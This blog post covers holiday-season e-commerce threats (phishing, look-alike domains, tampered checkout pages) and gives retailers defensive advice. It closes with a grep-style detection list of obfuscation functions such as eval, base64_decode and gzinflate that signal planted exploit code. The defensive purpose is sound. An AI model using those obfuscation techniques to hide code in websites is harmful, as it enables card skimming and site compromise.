Black Friday has turned into an entire Black Week, followed closely by Cyber Monday and the online shopping frenzy continues until Christmas. For many retailers, this is the time for making big profits. Unfortunately, Cyber Monday does not stand for cybersecurity, so cybercriminals are also on the move looking for money, credit card numbers, credentials, and personal data to be used in identity thefts. For example, CheckPoint reported that the number of phishing emails has already doubled this November to hook incautious online shoppers with fake Black Friday and Cyber Monday deals. Read our tips on how to protect your customers and your company.
Spam, malware, fake sites, and phishing
As many businesses are reminding their customers about their best bargains with marketing emails, it’s easy for cybercriminals to blend in with their fraudulent emails. The malicious messages may have been crafted to look like the ones sent by popular brands or they look like they are advertising huge discounts if the receiver just reacts within 24 hours. Instead of getting the best deal of the year, your customers might end up downloading malware attached to the email.
Users clicking on the messages might also land on a look-alike website imitating a popular brand. Even the domain name might be misleading: it can be difficult to spot tiny differences, like using an extra hyphen, .net instead of .com, or using characters that look the same with a quick glance. Using legitimate-looking long domain names like black-friday-offers-company.com or refund-support-company.org is another trick. The purpose of these sites is typically to phish the account credentials credit card details. An unwary user might also get caught in a subscription trap and find themselves locked into continuous payments.
The hoax might also come in the form of a password reset email, or delivery failed notifications asking to fill in your credit card numbers to pay a missing delivery fee.
As a company: what to do?
- Keep your marketing messages consistent so customers can recognize how they typically look like, what kind of language you use, and what addresses you use for sending.
- Notify your customers about any known scams, for example on your website's front page. Note: Some of the phishing sites can be targeted also to your employees. Notify them too.
- Make it easy to report to you if people discover new fake emails or sites using your brand. For example, you can set up a new email address such as email@example.com or add it as a separate category in your website feedback form.
- Report phishing sites to your country’s national CERT, so they can coordinate site takedown with internet service providers.
- Consider using a threat intel service that provides look-alike domain monitoring, and other information about possible phishing attempts against your company and fake employee profiles.
Data breaches and fake payment sites
If you are using an external payment service provider, the attackers might modify your checkout page to redirect the customer to a fake payment site instead.
Both these attacks can be difficult to spot, especially by the customer.
As a company: what to do?
- Install the security updates of the server operating system, e-commerce platform, and other components used by the site regularly. Install critical updates as soon as possible.
- Conduct security assessments and vulnerability scanning or use bug bounties to get a regular assessment of your website’s security status so you can maintain it at a proper level. Read more tips from my previous blog, Are your IT systems secure? Five ways to check and improve the state of your information security. Use security monitoring to detect cyberattack attempts.
- Use multi-factor authentication for administrative functionality.
- Make sure your online shopping site is privacy-friendly and not heaven for identity theft. Collect only the minimum information you need for successful offering and customer relations, clearly state the uses of data, make it easy to opt-out, and protect the storing and handling of personal data.
A few extra tips for the website admins:
- If possible, mirror 3rd party scripts in-house to prevent unauthorized altering.
- Use Subresource Integrity to restrict executing only scripts that have been reviewed.
- Use Content Security Policy to allow scripts only from certain sources.
- Monitor changes in the 3rd party scripts you use and review the changes.
- When you're introducing new 3rd party plugins, libraries or components, review how well the component is maintained (are there release notes available, how often are changes made, any mentions about security, etc.), and does the distribution source or developer seem legit. If hardly anyone uses the plugin or you’re suddenly getting paid features for free, it might be fake.
- Monitor changes in your website filesystem. If suddenly new .js, .php, or .html files using base64_decode, eval, preg_replace, substr, gzinflate, or similar functions, it might be an exploit kit. Grepping for these regularly is a good idea. Other symptoms include base64 encoded data blobs inside these files. Check more tips on detecting suspicious activity from my previous blog.
Want to keep track of what's happening in cybersecurity? Sign up for Nixu Newsletter.